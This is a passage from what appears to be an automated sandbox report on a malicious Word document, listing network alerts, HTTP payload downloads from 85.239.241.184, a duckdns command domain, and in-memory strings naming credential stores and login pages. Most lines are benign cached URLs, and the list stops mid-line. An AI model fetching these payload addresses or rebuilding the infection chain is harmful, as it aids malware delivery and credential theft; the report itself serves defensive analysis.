                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 85.239.241.184
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,8_2_0041B411
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7C062474-9095-4952-BF9E-824EBC6F940A}.tmpJump to behavior
                  Source: global trafficHTTP traffic detected: GET /download/new_image_vbs/new_image_vbs.jpg HTTP/1.1Host: archive.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /35/wescreenthepicturewithbuttersmoothpy.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 85.239.241.184Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /35/WERFFG.txt HTTP/1.1Host: 85.239.241.184Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: bhv5928.tmp.11.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                  Source: RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: bhv5928.tmp.11.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: RegAsm.exe, 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: RegAsm.exe, 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: archive.org
                  Source: global trafficDNS traffic detected: DNS query: dremom2.duckdns.org
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: powershell.exe, 00000007.00000002.364796787.00000000026DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184
                  Source: powershell.exe, 00000007.00000002.364796787.00000000026DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184/35/WERFFG.txt
                  Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000001.00000002.350673257.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIF
                  Source: EQNEDT32.EXE, 00000001.00000002.350673257.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIF)
                  Source: EQNEDT32.EXE, 00000001.00000002.350673257.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIFce
                  Source: EQNEDT32.EXE, 00000001.00000002.350673257.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIFj
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                  Source: RegAsm.exe, RegAsm.exe, 00000008.00000002.875009514.0000000000539000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.875109899.0000000000572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 00000007.00000002.364637845.00000000002FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: powershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                  Source: powershell.exe, 00000005.00000002.369133356.0000000002461000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.364796787.0000000002461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                  Source: bhv5928.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
